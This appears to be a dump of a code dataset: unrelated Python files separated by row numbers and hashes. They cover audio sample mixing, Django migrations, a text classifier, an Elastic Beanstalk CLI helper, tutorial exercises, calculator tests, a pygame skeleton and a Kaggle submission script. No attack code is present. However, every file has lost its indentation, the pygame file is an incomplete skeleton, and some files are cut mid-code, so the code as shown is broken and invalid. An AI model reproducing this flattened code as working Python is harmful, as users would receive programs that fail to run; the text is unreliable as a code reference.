#ile razy mamy pomnozyc amplitude naszego dzwieku
mnoznik = 0
if( procent < 0 ):
mnoznik = 1 + procent
else:
# obliczamy najwyzsza amplitude w danym utworze i ona bedzie
# wyznaczac jak bardzo mozemy podglosnic
maks_ampli = 0
maks_ampli = max(abs(utwor))
mnoznik = 32767/maks_ampli # maksymalny mnoznik
# mnoznik minimalnie moze osiagnac wartosc 1, to co powyzej
# (mnoznik-1) mnozymy o procent zglosnienia
# i dodajemy do podstawy (czyli 1)
mnoznik = 1 + (mnoznik - 1)*procent
glosniej = mnoznik * utwor
#glosniej = np.array(glosniej, dtype=np.int16)
glosniej = glosniej.astype(np.int16)
return glosniej
else:
print("Podaj procent z zakresu -1 do 1")
#wierszyk1 = zmiana_glosnosci(wierszyk, b['loud'])
#wierszyk1
def tworzenie_piosenki(macierz_piosenki, czy_pelna = True, bpm = 120, \
freq = 44100, wages = None, loud = 0):
"""
glowna funkcja generujaca cala piosenke
arg:
numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca
definicje kolejnych cwiercnut (co ma byc grane
w danej cwiercnucie)
bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest
zapisana (nie jest, gdy tracki mialy nieodpowiednia
liczbe wierszy lub kolumn)
int: bpm - tempo piosenki w jednostce bpm
int: freq - ilosc probek w jednej sekundzie
list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1
probka, 2 etc.)
float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na
maxa, -1 - sciszamy na maxa
wyjscie:
numpy.ndarray (numpy.int16): gotowy utwór
"""
# macierz piosenki byla pusta, piosenka nie zostala utworzona
if(czy_pelna == False):
print("Nie utworzono piosenki")
return None
else:
import numpy as np
import scipy.io.wavfile
t_cwiercnuty = 60 / bpm # czas trwania jednej cwiercnuty (zalezy od
#tempa)
ile_cwiercnut = macierz_piosenki.shape[0] # ilosc cwiercnut
kanaly = macierz_piosenki.shape[1] # ilosc uzywanych sampli
frekw = freq
czas_utworu = ile_cwiercnut*t_cwiercnuty
# ile elementow bedzie w nowym utworze
ilosc_probek = int(frekw*czas_utworu)
# bedziemy tylko raz wczytywac zawartosc sampleXY.wav, wiec potrzebuje
# unikalne numery sampli
rozne_sample = np.unique(macierz_piosenki) # bierze lacznie z "--"
# w slownikach zapiszemy parametry tych sampli
# slownik z wartosciami danego sampla (tj. macierze numpy-owe z
# amplitudami)
sample_co = {}
sample_frekw = {} # slownik z ich frekwencjami
sample_dl = {} # slownik z ich dlugosciami
#wczytujemy te sample
# w iteratorze bierzemy napisy "01" "02" "--" itd. stringi!!!
for ktory_sampel in rozne_sample:
if(ktory_sampel != '--'):
# tworzymy napis z nazwa pliku sampla, np. "sample01.wav"
plik = ''.join(['sample',ktory_sampel,'.wav'])
# wczytujemy zawartosc i frekwencje danego sampla do
# odpowiednio nazwanego elementu w slowniku sample_co i
# sample_frekw
sample_frekw[ktory_sampel], sample_co[ktory_sampel] = \
scipy.io.wavfile.read(plik)
# tworzymy mono z naszego sampla
sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\
axis=1)/32767
# normalizujemy te wartosci
sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel]/ \
max(np.abs(sample_co[ktory_sampel])) * 32767)
# zapisujemy dlugosc sampli, czyli ilosc probek
# ( = czas_trwania*frekwencja)
sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]
else: # to samo robimy dla "--" recznie ustawiamy
# robimy cisze, gdy --
sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)
sample_frekw[ktory_sampel] = frekw # taka sama jak domyslna
sample_dl[ktory_sampel] = 0 # zakladamy czas 0 sekund
if wages is None:
wages = np.ones((1,kanaly))
else:
# zeby mialo wymiar (1,kanaly), a nie (kanaly,)
wages = np.array(wages).reshape(1,kanaly)
# definicja nowego utworu
T = np.linspace(0, czas_utworu, ilosc_probek)
for wiersz in range(0, ile_cwiercnut):
sample = [] # wczytamy sample z danej cwiecnuty
dlugosci = [] # tu zapiszemy ich dlugosci w tej cwiercnucie
for i in range(0, kanaly):
sampus = macierz_piosenki[wiersz,i]
sample.append(sample_co[sampus])
dlugosci.append(sample_dl[sampus])
# bierzemy najdluzszy sample i w calosci bedziemy go odtwarzac;
# reszte zatem tez w calosci odtworzymy, a gdy sie skoncza damy
# cisze (zera)
maksik = max(dlugosci)
# mamy tutaj macierz 4 na max dlugosc, przygotowana do zlaczenia
# potem tych dzwiekow w jeden
pusty = np.int16(np.zeros((len(sample), maksik)))
# dodajemy nasze dzwieki do tej pustej
for k in range(0, kanaly):
pusty[k][0:dlugosci[k]] = sample[k]
# mnozymy kolejne elementy wektora pusty (czyli sample) przez
# wagi i sumujemy
cwiercnuta = np.dot(wages, pusty)
#otrzymamy wymiar (1, x), a chcemy (x,), wiec bierzemy pierwszy
# element
cwiercnuta = cwiercnuta[0]
# poczatek biezacej cwiercnuty
poczatek_cwiercnuty = int(wiersz*t_cwiercnuty*frekw)
# jesli dodanie ostatnich cwiercnut bedzie wiazalo sie z
# przekroczeniem dlugosci tworzonego utworu, obcinamy ostatnie
# dzwieki, tak by zmiescic sie w tej dlugosci
if (poczatek_cwiercnuty + maksik) > ilosc_probek:
T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)]=\
cwiercnuta[0:len(T[poczatek_cwiercnuty:(poczatek_cwiercnuty +\
maksik)])]
else:
T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)] += \
cwiercnuta
T= np.array(T, dtype=np.int16)
#ustalamy glosnosc utworu
T = zmiana_glosnosci(T, loud)
return T
#pios, k = wczytywanie_sciezek(a)
#wierszyk = tworzenie_piosenki(pios, k, bpm = b['bpm'], freq = b['freq'], \
#wages = b['wages'])
#wierszyk = tworzenie_piosenki(pios, k, **b)
#wierszyk |
6,370 | 52a4213a1729e25f96faebc5fd4f299017446c5a | # Generated by Django 3.0.10 on 2020-12-19 15:07
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
("wagtailadmin", "0001_create_admin_access_permissions"),
]
operations = [
migrations.CreateModel(
name="Admin",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
],
options={
"permissions": [("access_admin", "Can access Wagtail admin")],
"managed": False,
"default_permissions": [],
},
),
]
|
6,371 | f82c961fc1accd362b34a685bac4cc35d98f44ef | import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
if __name__ == "__main__":
dataset = pd.read_csv('./dataset.csv')
X_train, X_test, y_train, y_test = train_test_split(
dataset["text"], dataset["label"], test_size=0.2, random_state=1, shuffle=True
)
baseline_pipeline = Pipeline(
[("vect", TfidfVectorizer(ngram_range=(1, 3))), ("svc", LinearSVC())]
)
baseline_pipeline.fit(X_train, y_train)
print(classification_report(y_test, baseline_pipeline.predict(X_test), digits=4)) |
6,372 | c9191df0fc04818b4df9c93a9479f75a60688aa9 | from django.shortcuts import render, HttpResponseRedirect, HttpResponse
from django.views.generic import View
from django.contrib.auth import login
from django.contrib.auth.models import User
class RegisterView(View):
def get(self, request):
return render(request, 'users/register.html', locals())
def post(self, request):
try:
user = User(first_name=request.POST.get('first_name'), last_name=request.POST.get(
'last_name'), email=request.POST.get('email'), username=request.POST.get('email'))
user.set_password(request.POST.get('password'))
user.save()
except Exception as e:
print(e)
return render(request, 'users/register.html', locals())
return HttpResponseRedirect('/users/login')
class HomeView(View):
def get(self, request):
return HttpResponse(f"Home Page | Logged in as - {request.user}")
|
6,373 | 653c8db6741a586694d91bd9928d8326cce9e41d | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from cement.utils.misc import minimal_logger
try:
import configparser
except ImportError:
import ConfigParser as configparser
from ..core import io, fileoperations
from ..operations import commonops
from ..lib import utils, elasticbeanstalk
from ..objects.exceptions import NotInitializedError, InvalidSyntaxError, \
NotFoundError
LOG = minimal_logger(__name__)
_marker = object()
_selected_app = None
def get_application_name(default=_marker, prompt=True):
global _selected_app
result = None
try:
result = fileoperations.get_config_setting('global', 'application_name')
except NotInitializedError:
if prompt:
result = _get_application_name_interactive()
if result is not None:
_selected_app = result
return result
# get_config_setting should throw error if directory is not set up
LOG.debug('Directory found, but no config or app name exists')
if default is _marker:
raise NotInitializedError
_selected_app = default
return default
def _get_application_name_interactive():
app_list = commonops.get_application_names()
file_name = fileoperations.get_current_directory_name()
new_app = False
if len(app_list) > 0:
io.echo()
io.echo('Select an application to use')
try:
default_option = app_list.index(file_name) + 1
except ValueError:
default_option = len(app_list)
app_name = utils.prompt_for_item_in_list(app_list, default=default_option)
return app_name
def get_environment_name():
environments = [env.name for env in elasticbeanstalk.get_app_environments(_selected_app)]
io.echo()
io.echo('Select an environment to use')
return utils.prompt_for_item_in_list(environments)
|
6,374 | 8a6eb2eb746e3b9de92998b70ddff2a39cb1f269 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/4/11 16:07
# @Author : LiuZhi
# @Site :
# @File : Function.py
# @Software: PyCharm
#求绝对值的函数
print(abs(100))
print(abs(-20))
print(abs(12.34))
#print(abs(1,2))
#print(abs('q'))
print(max(1,2))
print(max(1,2,3,-5))
print(int('123'))
print(int(12.34))
print(float('12.34'))
print(str(1.23))
print(str(100))
print(bool(1))
print(bool(''))
a = abs
print(a(-1))
n1 = 255
n2 = 1000
print(hex(255))
print(hex(1000))
from abstest import my_abs
print(my_abs(-2))
#print(my_abs(-2,3))
#print(my_abs('222'))
'''
pass用法
def nop():
pass
age = 26
if age >= 18:
pass
'''
import math
def move(x,y, step, angle = 0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx,ny
x, y = move(100, 100, 60, math.pi/6)
print(x,y)
r = move(100, 100, 60, math.pi/6)
print(r)
#求一元二次方程的根
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b*b - 4*a*c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c/b
x2 = x1
return x1, x2
else:
if d<0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d))/2/a
x2 = (-b - math.sqrt(d))/2/a
return x1,x2
print(quadratic(2, 3, 1))
print(quadratic(0,0,0))
def power(x):
return x*x
print(power(4))
print(power(-2))
#默认参数
def powerThree(x, n=2):
s = 1
while n >0 :
n = n - 1
s = s * x
return s
print(powerThree(5,3))
print(powerThree(5))
def enroll(name, gender, age = 6, city = 'Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
print(enroll('Sarah', 'F'))
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
print(add_end([1, 2, 3]))
print(add_end())
print(add_end())
print(add_end())
#可变参数
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3]))
print(calc((1, 2, 3)))
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calcTwo(1,2))
print(calcTwo())
numbers = [1, 2, 3]
print(calcTwo(numbers[0], numbers[1], numbers[2]))
print(calcTwo(*numbers))
#关键字参数
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
person('michael', 30)
person('michael', 30, city='Beijing')
person('michael', 30, gender='m', job='engineer')
extra = {'city':'Beijing', 'job': 'engineer'}
person('Jack', 24, city = extra['city'], job = extra['job'])
person('Jack', 24, **extra)
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
person('jack', 24, city='beijing', addr = 'chaoyang', zipcode=123456)
def personTwo(name, age, *, city, job):
print(name, age, city, job)
personTwo('jack', 24, city='beijing', job='engineer')
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
#personThree('jack', 24, 'beijing', 'engineer')
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
personFour('jack', 24, job = 'engineer')
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
args = (1,2, 3, 4)
kw = {'d':99,'x':'#'}
f1(*args, **kw)
args = (1,2, 3)
kw = {'d':88, 'x':'#'}
f2(*args, **kw)
|
6,375 | 318556a6c327294986fcef938c254b8dfe66adaa | class Car:
__name=""
__maxspeed = 0
def __init__(self):
self.__updateSoftware()
self.__name = "Supercar"
self.__maxspeed=320
def drive(self):
print("Driving")
print("name of the car " + self.__name)
def __updateSoftware(self):
print("Updating Software")
def sayHello(self,name=None):
if name is None:
print ("Hello")
else:
print("Hello" + name)
redcar = Car()
redcar.sayHello()
redcar.sayHello("Venky")
redcar.drive()
print(redcar._Car__maxspeed)
#redcar._Car__updateSoftware()
|
6,376 | f17d59ca9bfa82848ec6a599e98f759449ccdd14 | """
test_extra.py:
In this file i wrote extra tests to my calculator program.
Divided to some main parts:
- Math Errors Tests (divide in zero, factorial, complex numbers)
- Test with edge cases of minus (operator / sign)
- Big results tests: expression that their result
will be inf or cause overflow exception
- test spaces in expressions
- test to the tokens_validation.py functions:
valid brackets, unnecessary parentheses, last token validation
- Decimal point place in expressions
- pre and post unary operations
"""
from calculator_main_omega import *
from errors import *
# Math Errors Tests
def test_divide_in_zero_from_start():
# test divide in zero in case that
# we can see before solving
expression = '56/0'
result = main_evaluate(expression)
assert result.error_type == DIVIDE_ZERO
def test_divide_in_zero_while_solve():
# test divide in zero in case that
# we can't see before solving
expression = '56/(5-5)'
result = main_evaluate(expression)
assert result.error_type == DIVIDE_ZERO
def test_mod_in_zero():
expression = '-3%0'
result = main_evaluate(expression)
# this result need to be none because we mod in zero
assert result.error_type == DIVIDE_ZERO
def test_complex_number():
expression = '(-7)^0.5'
result = main_evaluate(expression)
# check if get COMPLEX_ERROR when get complex result
assert result.error_type == COMPLEX_ERROR
def test_factorial_negative():
expression = '(-9)!'
result = main_evaluate(expression)
# the factorial operation on negative numbers is not legal
assert result.error_type == FACTORIAL_ERROR
def test_factorial_not_round():
expression = '2.404!+34'
result = main_evaluate(expression)
# the factorial operation on fraction numbers is not legal
assert result.error_type == FACTORIAL_ERROR
def test_factorial_huge_number():
expression = '600000!+4'
result = main_evaluate(expression)
assert result.error_type == MEMORY_EXCEPTION
# Minus tests:
def test_minus_start():
# build expression that have '-' in the start
expression = '-2^3'
result = main_evaluate(expression)
assert result == -8
def test_minus_after_binary():
# test expression with minus after binary operator
expression = '5*-2'
result = main_evaluate(expression)
assert result == -10
def test_minuses_row():
# test expression with some minuses right after each other
expression = '---(4+2)+8----8'
result = main_evaluate(expression)
assert result == 10
def test_huge_equation():
expression = ('1+' * 10000) + '0'
# i build expression with 10000 operators
# i test this affect on my program
result = main_evaluate(expression)
assert result == 10000
def test_max_size_expression():
# build expression with size bigger then the
# MAX_EXPRESSION_SIZE
expression = '5' * (MAX_EXPRESSION_SIZE + 1)
result = main_evaluate(expression)
assert result.error_type == MEMORY_EXCEPTION
# Big results tests:
def test_pow_overflow():
expression = '225^225.6'
result = main_evaluate(expression)
assert result.error_type == MEMORY_EXCEPTION
def test_multiply_overflow():
expression = '170!*444444'
result = main_evaluate(expression)
# the result of this expression is too big to store in float
assert result.error_type == MEMORY_EXCEPTION
def test_minus_inf_number():
expression = '-67675765675675675675897333333333' \
'09876767565656756745345543333335' \
'67567563453423423423436546333337' \
'47646767567576575675756756733335' \
'76578867864564534535423423413533' \
'32523523525235235235235352352433' \
'12412413523523535235241241241231' \
'24124421874126512561275126571323' \
'52352353523524124124121241244218' \
'52352353523524124124121241244218' \
'52352353523524124124121241244218' \
'52352353523524124124121241244218'\
result = main_evaluate(expression)
# python store it in float('inf'),
# i test here if my program handle with that
assert result.error_type == MEMORY_EXCEPTION
def test_plus_inf_number():
expression = '67675765675675675675897333333333' \
'09876767565656756745345543333335' \
'67567563453423423423436546333337' \
'47646767567576575675756756733335' \
'76578867864564534535423423413533' \
'32523523525235235235235352352433' \
'12412413523523535235241241241231' \
'24124421874126512561275126571323' \
'52352353523524124124121241244218' \
'52352353523524124124121241244218' \
'52352353523524124124121241244218' \
'52352353523524124124121241244218'\
result = main_evaluate(expression)
# python store it in float('inf'),
# i test here if my program handle with that
assert result.error_type == MEMORY_EXCEPTION
# Space Test:
def test_space_inside_number():
# we have illegal space inside the number '47'
# in the real interpreter in python space inside
# a expression is invalid syntax
expression = '5*1^4+4 7+5'
result = main_evaluate(expression)
assert result.error_type == SPACE_IN_NUMBER
# Expression validations tests:
# Test to the validations that i do to
# expression before building the token list
def test_illegal_char_validation():
expr = '454#f'
validate = math_validations(expr)
assert validate.error_type == ILLEGAL_CHAR
def test_unnecessary_brackets_validation():
expr = '3^((4+4))'
validate = math_validations(expr)
# the double brackets around simple expression like: 4+4
# is not legal do check if my calculator recognize it before solving
assert validate.error_type == UNNECESSARY_PARENTHESES
def test_only_number_in_brackets():
expr = '(6)'
validate = math_validations(expr)
# test only number in brackets
assert validate is True
def test_opener_has_no_closer():
expr = '((65+6)/6+(4+8/3'
validate = math_validations(expr)
# error that say the one of the opener '(' has no ')'
assert validate.error_type == BRACKETS_ERROR
def test_closer_has_no_opener():
expr = '(4+5)+9)+25^4'
validate = math_validations(expr)
# error that say the one of the closer ')' has no '(' matched
assert validate.error_type == BRACKETS_ERROR
def test_last_token_pre_unary():
expr = '4!+~'
validate = math_validations(expr)
assert validate.error_type == LAST_TOKEN_ERROR
def test_last_token_binary_operator():
expr = '4!+'
validate = math_validations(expr)
assert validate.error_type == LAST_TOKEN_ERROR
# Test to the use of decimal point in expression
def test_double_dot_validation():
expr = '4!+7..7'
validate = math_validations(expr)
# dot can't be after dot, because of that the specific error
# will be 'dot after error'
assert validate.error_type == DOT_ERROR
def test_first_dot_validation():
expr = '.5+45*(65/7)'
validate = math_validations(expr)
# dot can't be the first char in expression
assert validate.error_type == DOT_ERROR
def test_dot_after_operator_validation():
expr = '45+.5'
validate = math_validations(expr)
# dot can't be after operator
assert validate.error_type == DOT_ERROR
def test_valid_dot():
expr = '45+0.5'
result = main_evaluate(expr)
assert result == 45.5
def test_no_fraction_after_dot():
expr = '8.*2'
# i decided to support expressions
# like that like the real python interpreter
result = main_evaluate(expr)
assert result == 16
# Pre Unary Tests:
def test_tilda_before_minus():
expr = '~~-(70)'
result = main_evaluate(expr)
assert result == -70
def test_pre_unary_in_a_row():
expr = '~~~2'
result = main_evaluate(expr)
assert result == -2
def test_pre_unary_with_minuses():
expr = '~-~--~-10'
result = main_evaluate(expr)
assert result == -10
# Post Unary Tests:
def test_post_unary_in_a_row():
expr = '3!!+4'
result = main_evaluate(expr)
assert result == 724
def test_post_unary_on_brackets():
expr = '(1+5&8$3)!+4'
result = main_evaluate(expr)
assert result == 724
|
6,377 | 7ce471b3a6966c1a60ae2e2f3ec42369fe3d0f9c | # Generated by Django 3.2.1 on 2021-05-17 18:02
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='Client',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(blank=True, max_length=255)),
('last_name', models.CharField(blank=True, max_length=255)),
('address', models.TextField(max_length=1000, verbose_name='Address')),
('phone', models.CharField(max_length=255, unique=True)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
],
options={
'verbose_name': 'Client',
'verbose_name_plural': 'Clients',
},
),
migrations.CreateModel(
name='Composition',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cost', models.PositiveIntegerField(default=0, verbose_name='Cost')),
],
options={
'verbose_name': 'Composition',
'verbose_name_plural': 'Compositions',
},
),
migrations.CreateModel(
name='Extra',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, unique=True, verbose_name='Name')),
('type', models.CharField(choices=[('dessert', 'Dessert'), ('drink', 'Drink'), ('other', 'Other')], default='other', max_length=20, verbose_name='Type')),
('price', models.PositiveIntegerField(verbose_name='Price')),
('discount_price', models.PositiveIntegerField(blank=True, null=True, verbose_name='Discount Price')),
],
options={
'verbose_name': 'Extra',
'verbose_name_plural': 'Extras',
'ordering': ('name', 'type'),
},
),
migrations.CreateModel(
name='Menu',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, unique=True, verbose_name='Name')),
('audio_file_name', models.CharField(blank=True, max_length=255, verbose_name='Music')),
('available', models.BooleanField(default=True, verbose_name='Available')),
('image', models.ImageField(blank=True, null=True, upload_to='images', verbose_name='Image')),
('font_name', models.CharField(blank=True, max_length=255, verbose_name='Font')),
('price', models.PositiveIntegerField(default=0, verbose_name='Price')),
],
options={
'verbose_name': 'Menu',
'verbose_name_plural': 'Menus',
},
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('number', models.CharField(max_length=255, unique=True)),
('status', models.CharField(choices=[('pending', 'Pending'), ('confirmed', 'Confirmed'), ('preparing', 'Preparing'), ('ready', 'Ready'), ('on_delivery', 'On Delivery'), ('delivered', 'Delivered'), ('canceled', 'Canceled'), ('no_answer', 'No Answer'), ('ditched', 'Ditched')], default='pending', max_length=20)),
('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orders', to='mainapp.client', verbose_name='Client')),
],
),
migrations.CreateModel(
name='ZeUser',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='auth.user')),
('phone', models.CharField(max_length=255, unique=True)),
('is_admin', models.BooleanField(default=False)),
('is_deliveryman', models.BooleanField(default=False)),
],
options={
'verbose_name': 'User',
'verbose_name_plural': 'Users',
},
bases=('auth.user',),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, verbose_name='Name')),
('position', models.PositiveIntegerField(default=1, verbose_name='Position')),
('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.menu', verbose_name='Menu')),
],
options={
'verbose_name': 'Section',
'verbose_name_plural': 'Sections',
'ordering': ('position',),
},
),
migrations.CreateModel(
name='PhoneNumber',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=255, unique=True, verbose_name='Phone Number')),
('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='phones', to='mainapp.client', verbose_name='Client')),
],
options={
'verbose_name': 'Phone Number',
'verbose_name_plural': 'Phone Numbers',
'ordering': ('id',),
},
),
migrations.CreateModel(
name='OrderLine',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.PositiveIntegerField(default=1, verbose_name='Quantity')),
('composition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.composition', verbose_name='Composition')),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lines', to='mainapp.order', verbose_name='Order')),
],
options={
'ordering': ('id',),
},
),
migrations.CreateModel(
name='Food',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, verbose_name='Name')),
('price', models.PositiveIntegerField(default=0, verbose_name='Price')),
('discount_price', models.PositiveIntegerField(blank=True, null=True, verbose_name='Discount Price')),
('description', models.TextField(blank=True, max_length=1000)),
('image', models.ImageField(blank=True, null=True, upload_to='images', verbose_name='Image')),
('section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.section', verbose_name='Section')),
],
options={
'verbose_name': 'Food',
'verbose_name_plural': 'Foods',
'ordering': ('name', 'section__position'),
},
),
migrations.CreateModel(
name='CompositionFood',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('food_price', models.PositiveIntegerField(default=0, verbose_name='Food Price')),
('composition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.composition', verbose_name='Composition')),
('food', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.food', verbose_name='Food')),
],
options={
'ordering': ('food__section__position',),
},
),
migrations.AddField(
model_name='composition',
name='extras',
field=models.ManyToManyField(related_name='compositions', to='mainapp.Extra', verbose_name='Extras'),
),
migrations.AddField(
model_name='composition',
name='menu',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.menu', verbose_name='Name'),
),
migrations.AddField(
model_name='composition',
name='selected_foods',
field=models.ManyToManyField(through='mainapp.CompositionFood', to='mainapp.Food', verbose_name='Selected Foods'),
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('address', models.TextField(max_length=1000, verbose_name='Address')),
('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='mainapp.client', verbose_name='Client')),
],
options={
'verbose_name': 'Address',
'verbose_name_plural': 'Addresses',
'ordering': ('id',),
},
),
]
|
6,378 | 9aeaab445ae9df5c27cc4375a8b6bf320d5ab873 | #代码整体框架
#引用库
#创建窗口
def GameStart():
#游戏背景对象
Background = pygame.image.load()
#挡板背景对象
Baddle = pygame.image.load()
#球对象
Ball = pygame.image.load()
#挡板位置信息
BaffleX
BaffleY
#球位置信息
BallX
ballY
BallSpeed
#帧率控制Clock对象
#显示时间Clock对象
#设置时间字体
#游戏结果
while True:
#接受信息处理
#绘制背景
#显示时间
#绘制球
#判断球边界条件
#定位板移动后坐标
#判断挡板边界条件
#刷新显示
def GameResult():
#游戏结果背景Surface对象
#游戏结果引导
# 游戏结果Font对象
# 重新开始按钮
# 重新开始Hover按钮
# 游戏结果
if __name__ == "__main__":
|
6,379 | 8c1bd4df5f33c433880d6a4becadf88fb922762b | import os
from flask import Flask
from flask.ext.login import LoginManager
from config import basedir
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.openid import OpenID
from momentjs import momentjs
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
lm = LoginManager()
lm.init_app(app)
app.jinja_env.globals['momentjs'] = momentjs
from app import views, models
|
6,380 | fe0b21deb2e48ad74449b264265729cb328090ea | import os
from sklearn import metrics
import pandas as pd
import numpy as np
from submission import submission
import argparse
import glob
def calc_auc(subm):
preds=subm['target'].values
labels=subm['labels'].values
if len(set(labels))==1:
print('warning calc_auc with single label dataset, return 0')
return 0
return metrics.roc_auc_score(labels, preds)
def save_submission(df, name, do_submit=False):
df_submission = df[['image_name', 'target']]
df_submission.to_csv(name, index=False)
if do_submit:
name_with_quotes='\"'+name+'\"'
os.system(f'kaggle competitions submit -c siim-isic-melanoma-classification -f {name_with_quotes} -m {name_with_quotes}')
def main(nfolds, work_dir):
val_avg_tta_le_auc=None
val_avg_tta_auc = None
tta_type='tta_'
for le in ['', 'le']:
for m_type in ['', tta_type]:
a = []
for fold in range(nfolds):
if len(le)>0:
name = f'val_le_{fold}_single_model_{m_type}submission.csv'
else:
name = f'val_{fold}_single_model_{m_type}submission.csv'
filename=os.path.join(work_dir, name)
if os.path.exists(filename):
sub = pd.read_csv(filename)
a.append(calc_auc(sub))
print(f'{le}_val_single_model_{m_type}metrics={a}')
print(f'{le}_val_single_model_{m_type}avg_metric={np.mean(a)}')
if m_type==tta_type:
if le=='le':
val_avg_tta_le_auc=np.mean(a)
else:
val_avg_tta_auc=np.mean(a)
for le in ['', 'le']:
for m_type in ['', 'tta_']:
a = []
subs = []
for fold in range(nfolds):
if le=='':
name = f'test_{fold}_single_model_{m_type}submission.csv'
else:
name = f'test_{le}_{fold}_single_model_{m_type}submission.csv'
filename=os.path.join(work_dir, name)
if os.path.exists(filename):
sub = pd.read_csv(filename)
a.append(calc_auc(sub))
save_submission(sub, os.path.join(work_dir, 'kaggle_' + name))
subs.append(sub)
if subs:
avg_sub = submission.aggregate_submissions(subs)
auc_avg_sub=calc_auc(avg_sub)
save_submission(avg_sub, os.path.join(work_dir, 'kaggle_' + f'test_{le}_{m_type}.csv'))
else:
auc_avg_sub=None
print(f'{le}_test_single_model_{m_type}metrics={a}')
print(f'{le}_test_single_model_{m_type}avg_metric={np.mean(a)}')
print(f'{le}_test_avg_model_{m_type}_metric={auc_avg_sub}')
return val_avg_tta_le_auc, val_avg_tta_auc
parser = argparse.ArgumentParser()
parser.add_argument('--work_dir',type=str)
parser.add_argument('--folds',type=int, default=0)
if __name__=="__main__":
args=parser.parse_args()
